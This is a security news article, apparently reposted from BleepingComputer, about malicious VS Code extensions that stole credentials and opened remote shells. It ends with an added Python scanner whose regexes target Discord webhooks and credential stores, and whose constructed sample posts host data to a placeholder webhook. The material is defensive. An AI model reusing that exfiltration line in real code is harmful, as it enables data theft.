The Alarming Rise of Malicious Extensions in Microsoft’s VSCode Marketplace


Cybercriminals Target Microsoft’s VSCode Marketplace

Cybercriminals have set their sights on Microsoft’s esteemed VSCode Marketplace, launching a series of insidious attacks by uploading three malicious Visual Studio extensions. Shockingly, these nefarious extensions managed to accumulate a staggering 46,600 downloads by unsuspecting Windows developers. The consequences of this breach, discovered by the diligent analysts at Check Point, are severe, as the malware embedded within the extensions enabled threat actors to pilfer vital credentials, exploit system vulnerabilities, and even establish a remote shell on victims’ machines.

Upon unearthing the malicious extensions, Check Point promptly alerted Microsoft, leading to their removal from the VSCode Marketplace on May 14, 2023, just ten days after the initial discovery on May 4. However, the aftermath of this cyberattack demands immediate action from developers who unwittingly installed these extensions. They must manually eliminate the malicious software from their systems and conduct thorough scans to detect any residual traces of infection.

The malicious extensions, exposed by Check Point researchers, shed light on the extent of the infiltration within the VSCode Marketplace. The most widespread among them was the deceptively named ‘Theme Darcula dark.’ Initially presented as an innocent enhancement for the Dracula color scheme on VS Code, this extension cunningly collected essential system information from developers, including hostname, operating system details, CPU platform specifications, total memory, and CPU information. Although devoid of overtly malicious activities, this unconventional behavior for a theme pack raised red flags. Astonishingly, ‘Theme Darcula dark’ amassed over 45,000 downloads, making it the most circulated extension in this illicit campaign.

Darcula extension on the VSCode Marketplace (Check Point)

Another malicious extension, ‘python-vscode,’ uploaded by an account named ‘testUseracc1111,’ attracted attention despite its cryptic description. With 1,384 downloads, this seemingly innocuous extension concealed a perilous secret. Further analysis uncovered its true nature as a C# shell injector, capable of executing arbitrary code or commands on compromised machines, effectively granting unauthorized control to threat actors.

Obfuscated C# code injector (Check Point)


Similarly, the extension named ‘prettiest java,’ mimicking the popular code formatting tool ‘prettier-java,’ deceived 278 unsuspecting users. Beneath its façade, this extension engaged in the malicious act of stealing saved credentials and authentication tokens from Discord, Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser. The stolen information was surreptitiously transmitted to the attackers via a Discord webhook, enabling them to exploit compromised accounts for their malicious purposes.

Searching for local secrets (Check Point)

In addition to the identified malicious extensions, Check Point also discovered numerous suspicious extensions exhibiting unsafe behaviors, such as unauthorized access to code from private repositories or downloading files without proper authorization. While these extensions could not be definitively classified as malicious, their actions raised concerns about potential security risks, emphasizing the need for heightened vigilance within software development environments.

This incident underscores the inherent risks associated with user-supported repositories, exemplified by the VSCode Marketplace. While software repositories that allow user contributions, such as NPM and PyPI, have long been targeted by threat actors, the VSCode Marketplace is now experiencing a similar onslaught. A previous demonstration by AquaSec in January revealed the ease with which malicious extensions could be uploaded to the VSCode Marketplace, presenting a series of highly suspicious cases. Although no malware was found during AquaSec’s investigation, the recent discoveries by Check Point substantiate the emergence of a disturbing trend. Threat actors are actively seeking to infect Windows developers by infiltrating reputable software repositories, mirroring their strategies in repositories like NPM and PyPI.

Secure Coding Practices

As a precautionary measure, all users of the VSCode Marketplace, as well as other user-supported repositories, are strongly advised to exercise utmost caution. Only install extensions from trustworthy publishers with significant downloads and positive community ratings. Engage in diligent research by reading user reviews to gauge the reliability and safety of extensions. Most importantly, it is imperative to conduct a thorough inspection of an extension’s source code before installation, ensuring transparency and mitigating potential security risks.
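The inspection step above can be partly automated. The script below is an added example, not code from the article, Check Point or Microsoft: it walks a directory of unpacked extensions, reads each package.json, and flags the behaviours described in this campaign (a theme pack that also ships executable code, host fingerprinting calls, Discord webhook URLs, access to browser or Discord credential stores, command execution). The indicator regexes, the risk levels and the default path ~/.vscode/extensions are assumptions made for illustration, and the two sample extensions it builds are constructed for the demo.

```python
"""Static triage of unpacked VS Code extensions (added example, not the article's code)."""
import json
import re
import sys
import tempfile
from pathlib import Path

# Indicator regexes constructed for this example from the behaviours the article
# describes. They are illustrative, not a vetted or exhaustive signature set.
INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "host_fingerprint": re.compile(r"\bos\.(?:hostname|platform|totalmem|cpus)\s*\(", re.I),
    "credential_store": re.compile(r"Login Data|Local State|discordcanary|Local Storage[\\/]+leveldb", re.I),
    "command_exec": re.compile(r"\b(?:child_process|execSync|spawnSync|spawn|exec)\b"),
    "obfuscation": re.compile(r"\beval\s*\(|new\s+Function\s*\(|(?:\\x[0-9a-f]{2}){4}", re.I),
}
HIGH_SEVERITY = {"discord_webhook", "credential_store"}


def scan_extension(ext_dir: Path) -> dict:
    """Build a report for one unpacked extension directory."""
    report = {"dir": ext_dir.name, "name": None, "publisher": None, "runs_code": False,
              "is_theme": False, "activates_on_startup": False, "hits": {}}
    manifest_path = ext_dir / "package.json"
    if manifest_path.is_file():
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        report["name"] = manifest.get("name")
        report["publisher"] = manifest.get("publisher")
        # "main" is the JavaScript entry point; a pure colour theme has no reason to declare one.
        report["runs_code"] = bool(manifest.get("main"))
        report["is_theme"] = "themes" in manifest.get("contributes", {})
        events = manifest.get("activationEvents", [])
        report["activates_on_startup"] = any(e in ("*", "onStartupFinished") for e in events)
    # Grep every shipped JavaScript file for the indicator patterns.
    for js in sorted(ext_dir.rglob("*.js")):
        text = js.read_text(encoding="utf-8", errors="replace")
        for label, pattern in INDICATORS.items():
            if pattern.search(text):
                report["hits"].setdefault(label, []).append(js.relative_to(ext_dir).as_posix())
    return report


def triage(report: dict) -> str:
    """Map a report to a coarse risk level (thresholds are an assumption of this example)."""
    if report["is_theme"] and report["runs_code"]:
        return "high"          # the 'Theme Darcula dark' pattern: a theme that executes code
    if HIGH_SEVERITY & set(report["hits"]):
        return "high"          # exfiltration channel or credential-store access
    if report["hits"]:
        return "medium"
    return "low"


def scan_extensions_root(root: Path) -> list:
    """Scan every extension directory directly under root."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()]


def build_sample_extensions(base: Path) -> None:
    """Write two constructed extensions: a clean theme and a theme that also runs code."""
    benign = base / "sample.benign-theme-0.0.1"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "benign-theme", "publisher": "sample",
        "contributes": {"themes": [{"label": "Benign", "path": "./theme.json"}]}}))
    suspicious = base / "sample.suspicious-theme-0.0.1"
    suspicious.mkdir(parents=True)
    (suspicious / "package.json").write_text(json.dumps({
        "name": "suspicious-theme", "publisher": "sample", "main": "./extension.js",
        "activationEvents": ["*"],
        "contributes": {"themes": [{"label": "Suspicious", "path": "./theme.json"}]}}))
    # Constructed payload mirroring the behaviours described: fingerprint the host,
    # then post it to a (placeholder) Discord webhook.
    (suspicious / "extension.js").write_text(
        'const os = require("os");\n'
        'const info = { host: os.hostname(), mem: os.totalmem() };\n'
        'fetch("https://discord.com/api/webhooks/PLACEHOLDER/EXAMPLE", { method: "POST" });\n')


def demo() -> dict:
    """Build the constructed samples in a temp dir and return {dir: (risk, hit labels)}."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        build_sample_extensions(base)
        return {r["dir"]: (triage(r), sorted(r["hits"])) for r in scan_extensions_root(base)}


if __name__ == "__main__":
    # Default path is an assumption for a typical VS Code install; pass another root as argv[1].
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.home() / ".vscode" / "extensions"
    for r in scan_extensions_root(root):
        print(f"{triage(r):6} {r['publisher']}.{r['name']} hits={sorted(r['hits'])}")
```

Run it with no arguments to triage the extensions already installed on a machine, or with a path to a directory of unpacked .vsix contents to vet a candidate before installing it. A "high" result is a prompt to read the flagged file, not a verdict: legitimate extensions do spawn processes and read system information, which is why the script reports which file matched which indicator rather than deleting anything.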

In a digital landscape fraught with evolving threats, the security and well-being of developers and their projects hinge on their ability to remain steadfast, proactive, and informed. By adopting stringent security practices and cultivating a culture of attentiveness, the software development community can fortify its defenses against malicious infiltrations and forge a safer environment for innovation and collaboration.


Source: bleepingcomputer.com


The post The Alarming Rise of Malicious Extensions in Microsoft’s VSCode Marketplace first appeared on Black Hat Ethical Hacking.
